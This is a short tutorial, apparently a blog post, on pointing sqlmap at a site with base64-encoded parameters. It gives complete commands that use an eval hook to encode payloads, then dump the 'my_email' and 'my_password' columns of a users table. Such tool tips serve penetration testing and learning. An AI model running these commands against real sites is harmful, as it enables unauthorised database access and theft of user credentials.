sqlmap advanced tips and tricks
Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters.
For example, we have something like:
http://<target>/products/article.php?art_id=<base64_encoded_value>
In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows you to add your custom python code:
--eval=EVALCODE Evaluate provided Python code before the request
In python, if you want to encode a string using base64, you need something like:
import base64
print(base64.b64encode('MY_STRING'))
Tip: Would be useful to determine if you need a prefix as well (something like ‘ or “)
Once you get the database name,
In the end, the command will look something like this:
sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' "
Once you got a list of tables and let’s say you only want to retrieve the columns from the my_users table, you can add the -D and -T parameters.
sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' " -D my_db -T my_users
If you only want to focus on specific fields, you can use the -C option:
sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' " -D my_db -T my_users -C my_email,my_password
Hope this helps!